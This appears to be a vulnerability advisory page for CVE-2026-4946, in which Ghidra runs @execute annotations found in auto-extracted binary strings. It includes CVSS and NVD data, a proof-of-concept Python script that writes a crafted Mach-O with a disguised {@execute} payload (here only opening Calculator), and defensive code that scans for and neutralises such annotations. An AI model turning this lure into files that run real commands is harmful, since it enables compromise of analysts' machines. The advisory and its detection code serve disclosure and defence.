Security Vulnerability Report
CVE-2026-4946 CVSS 8.8 HIGH

Published: 2026-03-29 20:16:13
Last Modified: 2026-03-30 15:16:34

Description

Ghidra versions prior to 12.0.3 improperly process annotation directives embedded in automatically extracted binary data, resulting in arbitrary command execution when an analyst interacts with the UI. Specifically, the @execute annotation (which is intended for trusted, user-authored comments) is also parsed in comments generated during auto-analysis (such as CFStrings in Mach-O binaries). This allows a crafted binary to present seemingly benign clickable text which, when clicked, executes attacker-controlled commands on the analyst’s machine.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data has been published yet (NVD status: Awaiting Analysis).

Affected range per the advisory text: Ghidra < 12.0.3. Fixed in Ghidra 12.0.3.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-4946
# This script generates a malicious Mach-O binary structure *concept*: a minimal
# 32-bit Mach-O header followed by a string carrying a Ghidra @execute annotation.
# It emits no load commands and no __cstring/__cfstring section, so Ghidra will
# not import it as a real Mach-O; it only illustrates where the payload would sit.
import struct


def create_malicious_macho(filename):
    """
    Creates a dummy Mach-O file containing a malicious string.
    When a string like this is auto-extracted into a comment by Ghidra < 12.0.3,
    clicking the rendered (benign-looking) text runs the command.
    """
    # The program to run on click (opens Calculator on macOS), its argument, and
    # the harmless-looking text Ghidra displays in place of the directive.
    program = "/usr/bin/open"
    args = "/Applications/Calculator.app"
    display_text = "View License"

    # Ghidra comment annotations use the form {@tag ...}. The argument order
    # (program, parameters, display text) follows Ghidra's @execute annotation;
    # treat it as an assumption to verify against the Ghidra release under test.
    payload = f'{{@execute "{program}" "{args}" "{display_text}"}}'.encode("utf-8")

    with open(filename, "wb") as f:
        # Minimal 32-bit Mach-O header (struct mach_header: 7 x uint32, little-endian)
        f.write(struct.pack("<I", 0xFEEDFACE))  # magic (MH_MAGIC)
        f.write(struct.pack("<I", 0x00000007))  # cputype (CPU_TYPE_X86)
        f.write(struct.pack("<I", 0x00000003))  # cpusubtype (CPU_SUBTYPE_I386_ALL)
        f.write(struct.pack("<I", 0x00000002))  # filetype (MH_EXECUTE)
        f.write(struct.pack("<I", 0x00000000))  # ncmds (no load commands are written)
        f.write(struct.pack("<I", 0x00000000))  # sizeofcmds
        f.write(struct.pack("<I", 0x00000085))  # flags (MH_NOUNDEFS|MH_DYLDLINK|MH_TWOLEVEL)

        # In a real exploit the payload would live in a proper __cstring or
        # __cfstring section so auto-analysis extracts it as a CFString.
        # Here it is simply appended after some padding to simulate the data.
        f.write(b"\x00" * 100)  # Padding
        f.write(payload)

    print(f"[+] Generated malicious binary: {filename}")
    print(f"[+] Payload embedded: {payload.decode()}")


if __name__ == "__main__":
    create_malicious_macho("ghidra_exploit_poc")
```
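The description and the PoC above both turn on one detail: binary-derived text reaches Ghidra's comment renderer with annotation syntax ({@tag ...}) intact, and {@execute ...} runs a program on click. The following Python is an added example, not code from this page or from the Ghidra project. It covers the defensive side of both passages: scan_for_annotations() pulls printable strings out of an untrusted blob (the same heuristic as `strings -n 4`) and flags any that carry annotation syntax, so an analyst can triage a sample before opening it in a vulnerable Ghidra; neutralize_annotations() shows one transform an auto-analysis pass could apply to binary-derived text so the directive can no longer fire. Assumptions: the {@tag ...} syntax, the per-tag severities, and the sample blob are mine (the blob is constructed, not from a real binary), and neutralize_annotations() illustrates the fix idea rather than Ghidra's actual 12.0.3 change.

```python
"""Triage untrusted binaries for Ghidra comment-annotation lures.

Added example (not code from the advisory page or the Ghidra project).
Ghidra renders comment annotations written as {@tag arg ...}; {@execute ...}
launches a program when the rendered text is clicked.  CVE-2026-4946 is the
case where such a directive arrives inside auto-extracted string data.  This
module (1) scans a blob for printable strings carrying annotation syntax and
(2) shows one defensive transform for binary-derived comment text.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Annotation syntax assumed here: "{@" + tag + optional arguments + "}".
ANNOTATION_RE = re.compile(r"\{@(\w+)([^}]*)\}")
# Printable-ASCII runs of 4+ chars, the same heuristic as `strings -n 4`.
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")
# Tags that act on click. "execute" launches a process; "url" and "program"
# navigate (assumption: treat them as medium-severity lures).
SEVERITY = {"execute": "high", "url": "medium", "program": "medium"}


@dataclass
class Finding:
    offset: int      # file offset of the annotation's opening brace
    tag: str
    args: str
    severity: str


def scan_for_annotations(data: bytes) -> list[Finding]:
    """Return every annotation directive found inside printable strings."""
    findings: list[Finding] = []
    for run in STRING_RE.finditer(data):
        text = run.group().decode("ascii")
        for m in ANNOTATION_RE.finditer(text):
            tag = m.group(1).lower()
            findings.append(Finding(
                offset=run.start() + m.start(),
                tag=tag,
                args=m.group(2).strip(),
                severity=SEVERITY.get(tag, "info"),
            ))
    return findings


def neutralize_annotations(text: str) -> str:
    """Break the "{@" token so the comment renderer treats the text as plain.

    Illustrates the fix idea (auto-generated comments must never be
    annotation-capable); it is not Ghidra's actual 12.0.3 change.  A visible
    space is inserted rather than an invisible character so the analyst can
    still see that the string tried to carry a directive.
    """
    return text.replace("{@", "{ @")


# Constructed sample: a benign string, an @execute lure whose display text
# looks harmless, and a {@url} lure.  Not taken from any real binary.
SAMPLE_BLOB = (
    b"\x00" * 8
    + b"Hello, World\x00"
    + b'{@execute "/usr/bin/open" "/Applications/Calculator.app" "View License"}\x00'
    + b'{@url "https://example.invalid/readme" "Documentation"}\x00'
)


def triage(data: bytes) -> list[str]:
    """Human-readable report lines, worst findings first."""
    order = {"high": 0, "medium": 1, "info": 2}
    found = sorted(scan_for_annotations(data), key=lambda f: order[f.severity])
    return [f"[{f.severity.upper()}] +0x{f.offset:x} {{@{f.tag}}} args={f.args!r}"
            for f in found]


if __name__ == "__main__":
    for line in triage(SAMPLE_BLOB):
        print(line)
    print("neutralized:", neutralize_annotations('{@execute "/usr/bin/open" "x"}'))
```

Run it against a real sample with `triage(open(path, "rb").read())`; any HIGH line means the file should only be opened in Ghidra 12.0.3 or later, or with the string inspected first. The scanner is deliberately syntax-based rather than tag-based so that future annotation handlers are still surfaced as "info".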

References

https://github.com/NationalSecurityAgency/ghidra/security/advisories/GHSA-mc3p-mq2p-xw6v (GitHub security advisory for the Ghidra project)
https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110 (GCVE entry)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-4946",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-29T20:16:12.723",
    "lastModified": "2026-03-30T15:16:33.710",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Ghidra versions prior to 12.0.3 improperly process annotation directives embedded in automatically extracted binary data, resulting in arbitrary command execution when an analyst interacts with the UI. Specifically, the @execute annotation (which is intended for trusted, user-authored comments) is also parsed in comments generated during auto-analysis (such as CFStrings in Mach-O binaries). This allows a crafted binary to present seemingly benign clickable text which, when clicked, executes attacker-controlled commands on the analyst’s machine."
      },
      {
        "lang": "es",
        "value": "Las versiones de Ghidra anteriores a la 12.0.3 procesan incorrectamente las directivas de anotación incrustadas en datos binarios extraídos automáticamente, lo que resulta en la ejecución arbitraria de comandos cuando un analista interactúa con la interfaz de usuario. Específicamente, la anotación @execute (que está destinada a comentarios de confianza, creados por el usuario) también se analiza en comentarios generados durante el autoanálisis (como CFStrings en binarios Mach-O). Esto permite que un binario manipulado presente texto en el que se puede hacer clic, aparentemente benigno, que, al hacer clic, ejecuta comandos controlados por el atacante en la máquina del analista."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-78" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/NationalSecurityAgency/ghidra/security/advisories/GHSA-mc3p-mq2p-xw6v",
        "source": "[email protected]"
      },
      {
        "url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110",
        "source": "[email protected]"
      },
      {
        "url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000001011111111111000111111110000000000000000000000000000000000000000000000000000000110",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}
```